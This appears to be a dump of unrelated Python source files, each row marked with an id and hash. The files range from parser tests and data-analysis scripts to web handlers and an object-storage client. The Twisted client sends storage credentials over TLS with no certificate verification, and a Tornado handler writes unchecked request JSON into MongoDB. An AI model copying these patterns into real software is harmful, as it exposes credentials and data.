check("f((x**2 for x in something if x > 0), None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Call(Call('.', Name('something'), 'filter'), Def(('x',), (), Suite((Call('return', Call('>', Name('x'), Const(0))),)))), 'map'), Def(('x',), (), Suite((Call('return', Call('**', Name('x'), Const(2))),)))), Const(None))),)))
check("f((y**2 for x in something for y in x), None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Name('x'), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),)))), Const(None))),)))
check("f((y**2 for x in something for y in x if x > 0), None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Call(Call('.', Name('x'), 'filter'), Def(('y',), (), Suite((Call('return', Call('>', Name('x'), Const(0))),)))), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),)))), Const(None))),)))
check("f((y**2 for x in something for y in x if y > 0), None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Name('something'), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Call(Call('.', Name('x'), 'filter'), Def(('y',), (), Suite((Call('return', Call('>', Name('y'), Const(0))),)))), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),)))), Const(None))),)))
check("f((y**2 for x in something if x for y in x if x > 0), None)", Suite((Call('return', Call(Name('f'), Call(Call('.', Call(Call('.', Name('something'), 'filter'), Def(('x',), (), Suite((Call('return', Name('x')),)))), 'map'), Def(('x',), (), Suite((Call('return', Call(Call('.', Call(Call('.', Name('x'), 'filter'), Def(('y',), (), Suite((Call('return', Call('>', Name('x'), Const(0))),)))), 'map'), Def(('y',), (), Suite((Call('return', Call('**', Name('y'), Const(2))),))))),)))), Const(None))),)))
check("f(one=1)", Suite((Call('return', CallKeyword(Name('f'), (), (('one', Const(1)),))),)))
check("f(one=1, two=2)", Suite((Call('return', CallKeyword(Name('f'), (), (('one', Const(1)), ('two', Const(2))))),)))
check("f(x, one=1)", Suite((Call('return', CallKeyword(Name('f'), (Name('x'),), (('one', Const(1)),))),)))
check("f(x, one=1, two=2)", Suite((Call('return', CallKeyword(Name('f'), (Name('x'),), (('one', Const(1)), ('two', Const(2))))),)))
check("x[..., :]", Suite((Call('return', Call('[.]', Name('x'), Const(Ellipsis), Call('slice', Const(None), Const(None), Const(None)))),)))
check('x = y = 1', Suite((Assign((Name('x'), Name('y')), Const(1)), Call('return', Const(None)),)))
check('x = y = z = 1', Suite((Assign((Name('x'), Name('y'), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x, y = 1', Suite((Assign((Unpack((Name('x'), Name('y'))),), Const(1)), Call('return', Const(None)),)))
check('x, y = z = 1', Suite((Assign((Unpack((Name('x'), Name('y'))), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x = y, z = 1', Suite((Assign((Name('x'), Unpack((Name('y'), Name('z')))), Const(1)), Call('return', Const(None)),)))
check('x.a = y = 1', Suite((Assign((Call('.', Name('x'), 'a'), Name('y'),), Const(1)), Call('return', Const(None)),)))
check('x.a = y = z = 1', Suite((Assign((Call('.', Name('x'), 'a'), Name('y'), Name('z'),), Const(1)), Call('return', Const(None)),)))
check('x.a, y = 1', Suite((Assign((Unpack((Call('.', Name('x'), 'a'), Name('y'))),), Const(1)), Call('return', Const(None)),)))
check('x.a, y = z = 1', Suite((Assign((Unpack((Call('.', Name('x'), 'a'), Name('y'))), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x.a = y, z = 1', Suite((Assign((Call('.', Name('x'), 'a'), Unpack((Name('y'), Name('z')))), Const(1)), Call('return', Const(None)),)))
check('x = y.a = 1', Suite((Assign((Name('x'), Call('.', Name('y'), 'a'),), Const(1)), Call('return', Const(None)),)))
check('x = y.a = z = 1', Suite((Assign((Name('x'), Call('.', Name('y'), 'a'), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x, y.a = 1', Suite((Assign((Unpack((Name('x'), Call('.', Name('y'), 'a'))),), Const(1)), Call('return', Const(None)),)))
check('x, y.a = z = 1', Suite((Assign((Unpack((Name('x'), Call('.', Name('y'), 'a'))), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x = y.a, z = 1', Suite((Assign((Name('x'), Unpack((Call('.', Name('y'), 'a'), Name('z')))), Const(1)), Call('return', Const(None)),)))
check('x = y = z.a = 1', Suite((Assign((Name('x'), Name('y'), Call('.', Name('z'), 'a'),), Const(1)), Call('return', Const(None)),)))
check('x, y = z.a = 1', Suite((Assign((Unpack((Name('x'), Name('y'))), Call('.', Name('z'), 'a'),), Const(1)), Call('return', Const(None)),)))
check('x = y, z.a = 1', Suite((Assign((Name('x'), Unpack((Name('y'), Call('.', Name('z'), 'a'))),), Const(1)), Call('return', Const(None)),)))
check('x[0] = y = 1', Suite((Assign((Call('[.]', Name('x'), Const(0)), Name('y'),), Const(1)), Call('return', Const(None)),)))
check('x[0] = y = z = 1', Suite((Assign((Call('[.]', Name('x'), Const(0)), Name('y'), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x[0], y = 1', Suite((Assign((Unpack((Call('[.]', Name('x'), Const(0)), Name('y'),)),), Const(1)), Call('return', Const(None)),)))
check('x[0], y = z = 1', Suite((Assign((Unpack((Call('[.]', Name('x'), Const(0)), Name('y'))), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x[0] = y, z = 1', Suite((Assign((Call('[.]', Name('x'), Const(0)), Unpack((Name('y'), Name('z')))), Const(1)), Call('return', Const(None)),)))
check('x = y[0] = 1', Suite((Assign((Name('x'), Call('[.]', Name('y'), Const(0)),), Const(1)), Call('return', Const(None)),)))
check('x = y[0] = z = 1', Suite((Assign((Name('x'), Call('[.]', Name('y'), Const(0)), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x, y[0] = 1', Suite((Assign((Unpack((Name('x'), Call('[.]', Name('y'), Const(0)))),), Const(1)), Call('return', Const(None)),)))
check('x, y[0] = z = 1', Suite((Assign((Unpack((Name('x'), Call('[.]', Name('y'), Const(0)))), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x = y[0], z = 1', Suite((Assign((Name('x'), Unpack((Call('[.]', Name('y'), Const(0)), Name('z')))), Const(1)), Call('return', Const(None)),)))
check('x = y = z[0] = 1', Suite((Assign((Name('x'), Name('y'), Call('[.]', Name('z'), Const(0)),), Const(1)), Call('return', Const(None)),)))
check('x, y = z[0] = 1', Suite((Assign((Unpack((Name('x'), Name('y'))), Call('[.]', Name('z'), Const(0)),), Const(1)), Call('return', Const(None)),)))
check('x = y, z[0] = 1', Suite((Assign((Name('x'), Unpack((Name('y'), Call('[.]', Name('z'), Const(0)))),), Const(1)), Call('return', Const(None)),)))
check('x[:, ...] = y = 1', Suite((Assign((Call('[.]', Name('x'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)), Name('y'),), Const(1)), Call('return', Const(None)),)))
check('x[:, ...] = y = z = 1', Suite((Assign((Call('[.]', Name('x'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)), Name('y'), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x[:, ...], y = 1', Suite((Assign((Unpack((Call('[.]', Name('x'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)), Name('y'))),), Const(1)), Call('return', Const(None)),)))
check('x[:, ...], y = z = 1', Suite((Assign((Unpack((Call('[.]', Name('x'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)), Name('y'))), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x[:, ...] = y, z = 1', Suite((Assign((Call('[.]', Name('x'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)), Unpack((Name('y'), Name('z')))), Const(1)), Call('return', Const(None)),)))
check('x = y[:, ...] = 1', Suite((Assign((Name('x'), Call('[.]', Name('y'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)),), Const(1)), Call('return', Const(None)),)))
check('x = y[:, ...] = z = 1', Suite((Assign((Name('x'), Call('[.]', Name('y'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x, y[:, ...] = 1', Suite((Assign((Unpack((Name('x'), Call('[.]', Name('y'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)))),), Const(1)), Call('return', Const(None)),)))
check('x, y[:, ...] = z = 1', Suite((Assign((Unpack((Name('x'), Call('[.]', Name('y'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)))), Name('z')), Const(1)), Call('return', Const(None)),)))
check('x = y[:, ...], z = 1', Suite((Assign((Name('x'), Unpack((Call('[.]', Name('y'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)), Name('z')))), Const(1)), Call('return', Const(None)),)))
check('x = y = z[:, ...] = 1', Suite((Assign((Name('x'), Name('y'), Call('[.]', Name('z'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)),), Const(1)), Call('return', Const(None)),)))
check('x, y = z[:, ...] = 1', Suite((Assign((Unpack((Name('x'), Name('y'))), Call('[.]', Name('z'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)),), Const(1)), Call('return', Const(None)),)))
check('x = y, z[:, ...] = 1', Suite((Assign((Name('x'), Unpack((Name('y'), Call('[.]', Name('z'), Call('slice', Const(None), Const(None), Const(None)), Const(Ellipsis)))),), Const(1)), Call('return', Const(None)),)))
|
13,168 | 66510609ef28eb6141f244ef018ee35b3b1f5709 | from .data import preprocess_dataset
|
13,169 | 58499617f385bd3aa532d655fe99293ee40e65a7 | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
data = pd.read_csv("Invoice.csv")
data.head()
data.info()
data.describe()
df=pd.DataFrame(data)
df.drop(['Amount 1'],axis=1,inplace=True)
df =df.iloc[:, ~df.columns.str.contains('Unnamed')]
df.info()
import datetime
df['year']=pd.DatetimeIndex(df['AccountingDate']).year
df['month']=pd.DatetimeIndex(df['AccountingDate']).month
df.info()
df['AccountingDate'].min()
df['month']
df["month"]=df["month"]. astype(str)
df["year"]=df["year"]. astype(str)
df["month_year"]=df[["month","year"]].agg('-'.join,axis=1)
df.isnull().sum()
print(df.columns.tolist())
df.groupby("month_year").sum()["Amount "].reset_index()
df["Amount "]=df["Amount "].astype(int)
df["Amount "]
df_sales=df.groupby("month_year").sum()["Amount "].reset_index()
plt.figure(figsize=(15,6))
sns.barplot(x="month_year",y="Amount ",data=df_sales)
plt.xlabel("Date")
plt.ylabel("Amount")
plt.title("analysis of sales")
plt.show()
df_sales
plt.figure(figsize=(15,6))
sns.countplot(x="AmountCurrency",data=df)
plt.xlabel("AmountCurrency")
plt.ylabel("higest currency used")
plt.title("currency analysis")
plt.show()
df_supplier=df.groupby("SupplierId").sum()["Amount "].reset_index()
plt.figure(figsize=(120,20))
sns.barplot(x="SupplierId",y="Amount ",data=df_supplier)
plt.xlabel("Supplier")
plt.ylabel("Amount")
plt.title("analysis of supplier sales")
plt.xticks(rotation='vertical',size=10)
plt.ylim(1000,100000)
plt.show()
df_location=df.groupby("SupplierLocationId").sum()["Amount "].reset_index()
plt.figure(figsize=(40,10))
sns.barplot(x="SupplierLocationId",y="Amount ",data=df_location)
plt.xlabel("SupplierLocationId")
plt.ylabel("Amount")
plt.title("analysis of supplierlocation sales")
plt.xticks(rotation='vertical',size=10)
plt.show() |
13,170 | 9fff54fe3ce0c9a30ae1d36992c85be6a1cc61f9 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2015-06-09 20:53:40
# @Author : Your Name (you@example.org)
# @Link : http://example.org
# @Version : $Id$
import tornado.web
from tornado.web import asynchronous
from tornado.options import options
import json
from bson import ObjectId
from log import get_logger
import optionsSetting
from handler_baseHt import BaseHtHandler
from mongo_field_encoder import MongoFieldEncoder
from mongolog import MongoHandler
from mongokit.helpers import totimestamp, fromtimestamp
from auth import requires_auth
from tornado.httpclient import HTTPRequest
from utils.mongo_front import MongoFront
import datetime
try:
from tornado.curl_httpclient import CurlAsyncHTTPClient as AsyncHTTPClient
except ImportError:
from tornado.simple_httpclient import SimpleAsyncHTTPClient as AsyncHTTPClient
from model.version import Versions
log = get_logger()
class VersionsHandler(BaseHtHandler):
"""
版本管理类
"""
def __init__(self, application, request, **kwargs):
super(VersionsHandler, self).__init__(application, request, **kwargs)
@asynchronous
@requires_auth
def get(self):
log.info('VersionHandler.get')
where = {}
version_id = self.get_argument("version_id",None)
if version_id!=None:
where = {"_id": ObjectId(version_id)}
sort = [("created",-1)]
version = options.dbconn.Versions.find(where).sort(sort)
response={}
response["entities"]=list(version) or []
response["count"]=str(version.count())
self.write(json.dumps(response,indent=2, ensure_ascii=False,cls=MongoFieldEncoder))
self.finish()
@asynchronous
@requires_auth
def post(self):
log.info('VersionHandler.post')
request = self.request.body
created = datetime.datetime.utcnow()
version = options.dbconn.Versions.from_json(request)
version['created'] = created
version.save()
self.write(json.dumps({},indent=2, ensure_ascii=False,cls=MongoFieldEncoder))
self.finish()
@asynchronous
@requires_auth
def put(self):
log.info("ActivityHandler.put:"+self.request.body)
body_dic = json.loads(self.request.body,encoding="utf-8")
version_id = body_dic.get("version_id",None)
if version_id == None:
self.fire_response_bad_request()
return
del body_dic["version_id"]
if "tiptop" in body_dic:
os = body_dic.get("os","")
lookup = {"tiptop":True,"os":os}
update = {"$unset":{"tiptop":""}}
options.dbconn.Versions.find_and_modify(lookup, update,new=True)
lookup = {"_id": ObjectId(version_id)}
body_dic["modified"] = datetime.datetime.utcnow()
option = {'$set': body_dic}
version = options.dbconn.Versions.find_and_modify(lookup, option, new=True)
self.finish()
@asynchronous
@requires_auth
def delete(self):
log.info("ActivityHandler.delete:"+self.request.body)
version_id = self.get_argument("version_id",None)
if version_id == None:
self.fire_response_bad_request()
return
lookup = {"_id": ObjectId(version_id)}
version = MongoFront.remove(lookup,"versions")
self.finish()
|
13,171 | 58cfa50ea0489ac8aec88cbc4052f93a4ca46321 | from abc import ABCMeta, abstractmethod
class Cost(object):
__metaclass__ = ABCMeta
@abstractmethod
def lagr(self, x):
"""Running cost function (Lagrangian)
:param x: state
:return: running cost
"""
return
@abstractmethod
def phi(self, x):
"""Terminal cost function
:param x: state
:return: terminal cost for state x
"""
return |
13,172 | e6a6207265e092509226fd3b714b92544ac1ceb5 | import h5py
import numpy as np
from os.path import dirname, realpath
from scipy.signal import butter, filtfilt, lfilter
from utils.filters import dc_blocker, magic_filter_taps
data_dir = dirname(dirname(dirname(realpath(__file__)))) + '/data/'
def load_feedback(ica_artifact=False, csp_alpha=False, signal_name='left'):
with h5py.File(data_dir + 'experiment_data1.h5', 'r') as f: #TODO: path
protocol = 'protocol10'
raw = f[protocol+'/raw_data'][:]
print('Data was loaded from {} "{}"'.format(protocol, f[protocol].attrs['name']))
signals_names = list(f[protocol+'/signals_stats'].keys())
print(signals_names)
derived = f[protocol+'/signals_data'][:][:, signals_names.index(signal_name)]
_rejections_group = f[protocol+'/signals_stats/{}/rejections'.format(signal_name)]
rejections = [_rejections_group['rejection{}'.format(k + 1)][:] for k in range(len(_rejections_group)//2)]
left_spatial_filter = f[protocol+'/signals_stats/{}/spatial_filter'.format(signal_name)][:]
mean = f[protocol + '/signals_stats/{}/mean'.format(signal_name)].value
std = f[protocol + '/signals_stats/{}/std'.format(signal_name)].value
data = raw
if ica_artifact:
data = np.dot(data, rejections[0])
if csp_alpha:
data = np.dot(data, rejections[1])
signal = np.dot(data, left_spatial_filter)
print(left_spatial_filter)
return data, signal, derived*std + mean
def get_ideal_signal(band = (8, 12), causal=False, causal_iir=True, b_order=4, min_phase=False):
data, signal, derived = load_feedback(ica_artifact=True)
data = dc_blocker(data)
nq = 125
if min_phase:
from utils.filters import min_phase_magic_filter
return lfilter(min_phase_magic_filter(), 1.0, data, axis=0)
b, a = butter(b_order, [band[0] / nq, band[1] / nq], 'band')
if causal:
if not causal_iir:
data = lfilter(magic_filter_taps(), 1.0, data, axis=0)
else:
data = lfilter(b, a, data, axis=0)
else:
data = filtfilt(b, a, data, 0)
return data
def get_signal():
data, signal, derived = load_feedback(ica_artifact=True)
data = dc_blocker(data)
return data
def get_signal_data():
data, signal, derived = load_feedback(ica_artifact=True, csp_alpha=True)
data = dc_blocker(data)
signal = dc_blocker(signal)
return data, signal, derived
def load_normalised_raw_signal():
data, signal, derived = get_signal_data()
signal = (signal - signal.mean()) / signal.std()
return signal |
13,173 | 5863b7b9a1f70f04e8eaa3abaec6f6113c4f2f61 | import argparse
import glob
import os
import re
import shutil
import sys
import tarfile
import webbrowser
from argparse import RawTextHelpFormatter
from tarfile import TarFile
from time import process_time
from zipfile import ZipFile
import PySimpleGUI as sg
from six.moves.configparser import RawConfigParser
from extraction import *
from ilapfuncs import *
from report import *
from search_files import *
from settings import report_folder_base
# All the stuff inside your window.
sg.theme("DarkAmber") # Add a touch of color
layout = [
[
sg.Text("iOS Logs, Events, And Properties Parser.", font=("Helvetica", 25))
], # added font type and font size
[
sg.Text("https://github.com/abrignoni/iLEAPP", font=("Helvetica", 18))
], # added font type and font size
[
sg.Text(
"Select a file (TAR, ZIP) or directory of the target iOS full file system extraction for parsing.",
font=("Helvetica", 16),
)
], # added font type and font size
[
sg.Text("File:", size=(8, 1), font=("Helvetica", 14)),
sg.Input(),
sg.FileBrowse(font=("Helvetica", 12)),
], # added font type and font size
[
sg.Text("Directory:", size=(8, 1), font=("Helvetica", 14)),
sg.Input(),
sg.FolderBrowse(font=("Helvetica", 12)),
], # added font type and font size
[
sg.Checkbox(
"Generate CSV output (Additional processing time)",
size=(50, 1),
default=False,
font=("Helvetica", 14),
)
],
[sg.Output(size=(100, 40))], # changed size from (88,20)
[
sg.Submit("Process", font=("Helvetica", 14)),
sg.Button("Close", font=("Helvetica", 14)),
],
] # added font type and font size
# Create the Window
# Event Loop to process "events" and get the "values" of the inputs
def gui_event_loop(window):
while True:
event, values = window.read()
if event in (None, "Close"): # if user closes window or clicks cancel
break
pathto = values["Browse"] or values["Browse0"]
extracttype = get_filetype(pathto)
start = process_time()
log = pre_extraction(pathto, gui_window=window)
extract_and_process(pathto, extracttype, tosearch, log, gui_window=window)
running_time = post_extraction(start, extracttype, pathto)
if values[2] == True:
start = process_time()
window.refresh()
logfunc("")
logfunc(f"CSV export starting. This might take a while...")
window.refresh()
html2csv(report_folder_base)
if values[2] == True:
end = process_time()
time = start - end
logfunc("CSV processing time in secs: " + str(abs(time)))
locationmessage = "Report name: " + report_folder_base + "index.html"
sg.Popup("Processing completed", locationmessage)
basep = os.getcwd()
webbrowser.open_new_tab("file://" + basep + base + "index.html")
sys.exit()
|
13,174 | 806f251055c09ac604fa0a12c165da8b5f902232 | """
def decorator(func):
def decorated():
print('함수시작!')
func()
print('함수 끝!')
return decorated
@decorator
def hello_world():
print('hello_world')
hello_world()
"""
def decorator(area_func):
def decorated(x, y):
if x >= 0 and y >= 0:
return area_func(x,y)
else:
raise ValueError("Input must be positive value")
return decorated
@decorator
def square_area(x, y):
return x * y
@decorator
def triangle_are(x, y):
return (x * y) * 0.5
a = int(input(" a : "))
b = int(input(" b : "))
print(square_area(a,b))
print(triangle_are(a,b))
|
13,175 | 9ae7f0cadae040bfe49204bd9b5c971d55de6503 | #! /usr/bin/env python
# coding: utf8
#
# Moves the pan and tilt module and performs calculations to
# determine the distance and rotation to the edge of a desk.
import sys
import math
sys.path.insert(0, "../../lib/PiconZero/Python")
DEBUG = False
def getDistanceAndRotationToEdge(l, f, r):
""" Calculate the distance and rotation to the edge of the desk """
if DEBUG:
print "lfr:", l,",",f,",",r
# Maths help from: http://xaktly.com/MathNonRightTrig.html
# - Specfically the law of cosines, but at least one of their
# examples is wrong, but methods are correct... sigh.
#
# For triangle with forward length, shortest of
# left and right length, and desk edge as sides...
#
# f = forward distance length
# l = left distance length
# r = right distance length
# e = length of desk edge between left and right views
# s = shortest of left and right distance length
# v = "view" angle of how much robot looks left or right
# g = angle between f and e
# d = distance between robot and edge of desk
# a = angle between the way the robot is facing and edge of desk
# (i.e. if the robot is facing directly towards edge it's 0)
# (in radians or degrees?..)
#
# e² = f² + s² - 2 * f * s * cos(v)
# g = sin⁻¹ * (s * sin(v) / e)
# d = f * sin(g)
# a = 180 - 90 - g (minus or positive depending on if s is left or right)
# Figure out if the edge of the desk is more to the right or left
# s = min(l, r) <-- Used to use this, but need additional things.
# r | l | s
# x | x | ?
# 1 | 1 | ? Logic table for _r_ight, _l_eft, and output
# 0 | 0 | ? _s_hortest distances from robot to desk edge
# x | 0 | l
# 1 | x | r x = None
# 0 | 1 | r 1 = arbitrary high-ish value
# x | 1 | l 0 = arbitrary low-ish value
# 1 | 0 | l
# 0 | x | r
# Distance to right and left are missing?
if r is None and l is None:
if DEBUG:
print "INFO: Skipping edge calcs because of missing distances."
return int(round(f)), 0
# Distance to right and left identical?
elif r == l:
if DEBUG:
print "INFO: Skipping edge calcs because of identical distances."
# This is unlikely-ish because l, f, r are floats...
#
# r < f r > f
# ◆ | or ◼
# ____➘| __🠛__
#
return int(round(min(r, f))), 0
# Figure out if _l_eft or _r_ight is the shorter distance
else:
if r is None:
s = l
direction = -1
elif l is None:
s = r
direction = 1
elif l < r:
s = l
direction = -1
elif r < l :
s = r
direction = 1
cosV = math.cos(math.radians(45))
sinV = math.sin(math.radians(45))
e = f**2 + s**2 - 2 * f * s * cosV
e = math.sqrt(e)
g = math.degrees(math.asin(s * sinV / e))
d = f * math.sin(math.radians(g)) # Switching degrees/radians f'debugging
a = (90 - g) * direction
'''
# Debug stuff
print "f =", f
print "l =", l
print "r =", r
print "e =", e
print "s =", s
print "v =", 45
print "g =", g
print "d =", d
print "a =", a
'''
distance = int(round(d))
rotation = int(round(a))
if DEBUG:
print "Distance to edge:", str(distance) + "cm"
print "Rotation to edge:", str(rotation) + "°"
return distance, rotation
|
13,176 | 03ba7a367bde6dd33d033b762461f21c7b290441 | """
Twisted connection type.
See COPYING for license information
"""
from zope import interface
from object_storage.transport import requote_path
from object_storage.errors import NotFound
from object_storage.transport import Response, BaseAuthenticatedConnection, \
BaseAuthentication
from object_storage import errors
from twisted.internet import reactor
from twisted.internet.defer import Deferred
from twisted.internet.protocol import Protocol
from twisted.internet.ssl import ClientContextFactory
from twisted.web.client import Agent
from twisted.web.http_headers import Headers
from twisted.web.iweb import IBodyProducer, UNKNOWN_LENGTH
import urlparse
import urllib
from object_storage.utils import json
def complete_request(resp, callback=None, load_body=True):
r = Response()
r.status_code = resp.code
r.version = resp.version
r.phrase = resp.phrase
for k, v in resp.headers.getAllRawHeaders():
r.headers[k.lower()] = v.pop()
if r.status_code == 404:
raise NotFound('Not found')
r.raise_for_status()
if not load_body:
if callback:
return callback(r)
return r
def build_response(body):
r.content = body
if callback:
return callback(r)
return r
finished = Deferred()
resp.deliverBody(FullBodyReader(finished))
finished.addCallback(build_response)
return finished
def print_error(failure):
from twisted.web import _newclient
if failure.check(_newclient.RequestGenerationFailed):
for f in failure.value.reasons:
print f.getTraceback()
return failure
class AuthenticatedConnection(BaseAuthenticatedConnection):
def __init__(self, auth, **kwargs):
self.token = None
self.storage_url = None
self.auth = auth
def authenticate(self):
d = self.auth.authenticate()
d.addCallback(lambda r: self._authenticate())
return d
def make_request(self, method, url=None, headers=None, *args, **kwargs):
headers = headers or {}
headers.update(self.get_headers())
return make_request(method, url=url, headers=headers, *args, **kwargs)
def make_request(method, url=None, headers=None, *args, **kwargs):
""" Makes a request """
headers = Headers(dict([(k, [v]) for k, v in headers.items()]))
formatter = None
if 'formatter' in kwargs:
formatter = kwargs.get('formatter')
del kwargs['formatter']
if not formatter:
def _nothing(result):
return result
formatter = _nothing
params = kwargs.get('params', None)
if params:
params = urllib.urlencode(params)
url = _full_url(url, params)
body = kwargs.get('data')
# print method, url, headers, body
contextFactory = WebClientContextFactory()
agent = Agent(reactor, contextFactory)
d = agent.request(
method,
url,
headers,
body)
load_body = True
if method.upper() in ['HEAD', 'DELETE']:
load_body = False
d.addCallback(complete_request, formatter, load_body=load_body)
d.addErrback(print_error)
return d
def _full_url(url, _params={}):
"""Build the actual URL to use."""
# Support for unicode domain names and paths.
scheme, netloc, path, params, query, fragment = urlparse.urlparse(url)
if not scheme:
raise ValueError("Invalid URL %r: No schema supplied" % url)
netloc = netloc.encode('idna')
if isinstance(path, unicode):
path = path.encode('utf-8')
path = requote_path(path)
url = str(urlparse.urlunparse([scheme, netloc, path, params, query,
fragment]))
if _params:
if urlparse.urlparse(url).query:
return '%s&%s' % (url, _params)
else:
return '%s?%s' % (url, _params)
else:
return url
class Authentication(BaseAuthentication):
"""
Authentication class.
"""
def __init__(self, username, api_key, auth_token=None, *args, **kwargs):
super(Authentication, self).__init__(*args, **kwargs)
self.username = username
self.api_key = api_key
self.auth_token = auth_token
if self.auth_token:
self.authenticated = True
@property
def auth_headers(self):
return {'X-Auth-Token': self.auth_token}
def _authenticate(self, response):
if response.status_code == 401:
raise errors.AuthenticationError('Invalid Credentials')
response.raise_for_status()
try:
storage_options = json.loads(response.content)['storage']
except ValueError:
raise errors.StorageURLNotFound("Could not parse services JSON.")
self.auth_token = response.headers.get('x-auth-token', 'huh?')
self.storage_url = self.get_storage_url(storage_options)
if not self.storage_url:
self.storage_url = response.headers['x-storage-url']
raise errors.StorageURLNotFound("Could not find defined "
"storage URL. Using default.")
if not self.auth_token or not self.storage_url:
raise errors.AuthenticationError('Invalid Authentication Response')
def authenticate(self):
""" Does authentication """
headers = {'X-Storage-User': self.username,
'X-Storage-Pass': self.api_key,
'Content-Length': '0'}
d = make_request('GET', self.auth_url, headers=headers)
d.addCallback(self._authenticate)
return d
class WebClientContextFactory(ClientContextFactory):
def getContext(self, hostname, port):
return ClientContextFactory.getContext(self)
class FullBodyReader(Protocol):
def __init__(self, finished):
self.finished = finished
self.body = ''
def dataReceived(self, data):
self.body += data
def connectionLost(self, reason):
self.finished.callback(self.body)
class ChunkedConnection:
"""
Chunked Connection class.
setup() will initiate a HTTP connection.
send_chunk() will send more data.
finish() will end the request.
"""
def __init__(self, conn, url, headers=None, size=None):
self.conn = conn
self.url = url
self.req = None
self.headers = headers
self.started = Deferred()
self.size = size
self.body = ChunkedStreamProducer(self.started, self.size)
def setup(self, size=None):
"""
Sets up the connection. Will optionally accept a size or
else will use a chunked Transfer-Encoding.
"""
if size:
self.size = size
if not self.size:
self.size = UNKNOWN_LENGTH
self.body.length = self.size
req = self.conn.make_request('PUT', self.url,
headers=self.headers,
data=self.body)
self.req = req
print "ChunkedTwistedConnection: STARTED REQUEST"
def send_chunk(self, chunk):
""" Sends a chunk of data. """
print "ChunkedTwistedConnection: send chunk"
return self.body.send(chunk)
def finish(self):
""" Finished the request out and receives a response. """
self.body.finish()
class ChunkedStreamProducer(object):
interface.implements(IBodyProducer)
def __init__(self, started, length=UNKNOWN_LENGTH):
self.length = length
self.consumer = None
self.started = Deferred()
self.finished = Deferred()
def startProducing(self, consumer):
print "ChunkedStreamProducer: START PRODUCING"
self.consumer = consumer
self.started.callback(None)
return self.finished
def _send(self, result, data):
print "ChunkedStreamProducer: _SEND"
return self.consumer.write(data)
def send(self, data):
print "ChunkedStreamProducer: SEND"
d = Deferred()
self.started.chainDeferred(d)
d.addCallback(self._send, data)
return d
def finish(self):
def _finish(result):
self.finished.callback(None)
return None
d = Deferred()
self.started.chainDeferred(d)
d.addCallback(_finish)
return d
def pauseProducing(self):
print "pause"
pass
def stopProducing(self):
print "STOP"
pass
|
13,177 | ba0d1b42a84f79a9a88cda3796b0131321a198a1 | # Generated by Django 2.2.4 on 2020-05-04 16:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('IT_company', '0043_auto_20200504_1920'),
]
operations = [
migrations.AlterField(
model_name='client',
name='ClientEmail',
field=models.EmailField(max_length=50, verbose_name='E-mail'),
),
]
|
13,178 | e957c4d47cceeefabdfb5df33b20bb020de70c37 | # coding:utf-8
from MongoDb2Csv.MongoBaseDao import MongoBaseDao
import pandas as pd
class MongodbToCsv:
"""
将MongoDB中的数据按照一定的条件取出,删除部分后再存为Csv格式
"""
def __init__(self):
"""
实例化一个操作mongo的对象
"""
self.__mongo = MongoBaseDao('192.168.65.119', 27017, 'spider')
def read_delete_by_time_save_to_csv(self, col_name):
"""
根据时间读取表中所有数据
:param col_name: 在哪个collection中查找
:param datetime: date_time列格式化为datetime对象数组
:param key_time: 要根据什么字段查找
:return:
"""
self.__mongo.change_collection(col_name)
# 按照时间取多条数据
collection = self.__mongo.find_multi_info(filter_dict={}, return_dict=None)
tmp_data_taken_out = pd.DataFrame(list(collection)) # 转换成DataFrame格式
# self.__mongo.delete_info(list(collection)) #按照时间删除
# print(TmpData_taken_out)
filepath = "H:\\Spider\\美术设计师2d3d.csv"
tmp_data_taken_out.to_csv(filepath, sep=',') # 将DataFrame存储为csv,index表示是否显示行名,default=True
@staticmethod
def main():
a = MongodbToCsv()
a.read_delete_by_time_save_to_csv('美术设计师2d3d')
MongodbToCsv.main()
|
13,179 | 3543c4ec1b716982b767e768de03465c2f6bb5a4 | from dataset.citation import Citation
from dataset.hypergrad_mnist import *
|
13,180 | a2177f35916e534129ee3e2072bd6d3a4203d1f0 | t=input()
while(t>0):
t=t-1
s=raw_input()
r=s[::-1]
if r == s :
print "YES"
else:
print "NO" |
13,181 | e943a79a8a609cac970f8a4bebdfd98b5874aa52 | # -*- coding: utf-8 -*-
# vim: ft=python
"""
Pytest fixtures for all lfulib tests.
"""
# Import Python Libs.
from __future__ import absolute_import
from collections import deque
# Imports to others.
__all__ = []
FREQUENCY = {
1: deque([2, 3]),
2: deque([1]),
}
NOT_FOUND = -1
|
